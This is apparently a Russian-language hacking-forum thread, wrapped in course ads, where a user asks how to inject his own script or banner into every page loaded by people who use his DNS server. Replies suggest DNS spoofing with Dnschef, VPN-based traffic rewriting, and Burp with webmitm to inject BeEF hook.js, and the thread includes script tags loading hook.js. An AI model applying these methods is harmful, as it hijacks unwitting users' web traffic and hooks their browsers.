Добрый вечер, возник такой вопрос, имея свой днс сервер, как реализовать добавление своего кода(банера) во все открываемые страницы ( при условии что в настройках у меня стоит мой днс сервер) ? подскажите в какую сторону копать )
-
15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby
За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.
На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.
Запись на курс до 25 апреля. Получить промодоступ ...
Проблема Фэйковый DNS
- Автор темы krastyka
- Дата начала
-
- Теги
- dns
Все банеры и реклама подгружаются на сайт с какого-то другого сайта (AdSense и т.д.). В теории нужно , что бы эти сервера поменялись на твоём ДНС сервере, на нужние тебе. Сам на практике такого не делал, но нужно попробывать).
Да тоже думал в сторону (AdSense и т.д.) но ничего толкового найти не удалось ;(
ну подождем ) может у кого есть подобный опыт и он готов им поделится )
P.S. Мне не обязательна реализация через подмену всей рекламы, достаточно встраивать на лету в страницу небольшой блок
P.S. Мне не обязательна реализация через подмену всей рекламы, достаточно встраивать на лету в страницу небольшой блок
Что это такое я в курсе, а вот как реализовать это через подмененный dns?
Тут же получается то же самое, мне каким-то образом нужно впихнуть XSS скрипт в каждую страницу
[doublepost=1505823863,1505764605][/doublepost]В Dnschef прописал avatars.mds.yandex.net=ип моего сервера но вс равно реклама загружается с яндекс директа, подобным образом занес все хосты от adaway.org - результат тот же реклама та же самая что и была, моя html страница не грузится, ткните пожауйста носом куда копать дальше )
да если в хост прописать ип avatars.mds.yandex.net - то просто срезает всю рекламу, значит что-то я делаю не так )
1. Пересмотри настройки DNS сервера.
2. Некоторые провайдеры урезают возможность смены DNS, изменяя его в любом случае на провайдерский.
[doublepost=1505830069,1505829987][/doublepost]
да спасибо, но именно подменить страницу - нет проблем, а вот заменить рекламный блок - у меня не получается, скорее всего я что-то не правильно переадресовываю, в идеале найти бы метод пропуская через себя весь трафик инжектить в страницу ява скрипт
У тебя конкретная жертва?
Можно организовать ВПН сервис на сервате и подключать всех через роутер, а на самом сервера делать подмену трафика.
Да нет, тут именно что единственный вариант это DNS вроде есть догадки что можно провернуть всё в связке Dnschef и beef но вот не пойму там инжектируется файл hook.js а мне надо в страницу встроить примерно это
<script src="
<link rel="stylesheet" href="hook/hook.css" type="text/css" />
<script src="hook/hook.js" type="text/javascript"></script>
<script src="
Ссылка скрыта от гостей
" type="text/javascript"></script><link rel="stylesheet" href="hook/hook.css" type="text/css" />
<script src="hook/hook.js" type="text/javascript"></script>
это все можно сделать через burp-suite в параметрах proxy, то есть замена нужного контента на свой) webmitm утилиту нужно тоже подключать что бы она трафик на себя тянула, так же можно в трафик с помощью бурпа сделать инжект своего JS например от beef-xss ))
+ на своем vps
+ будет гемор с https
+ сертификат нужно нарыть)) для бурпа
+ на своем vps
+ будет гемор с https
+ сертификат нужно нарыть)) для бурпа
Последнее редактирование:
Обучение наступательной кибербезопасности в игровой форме. Начать игру!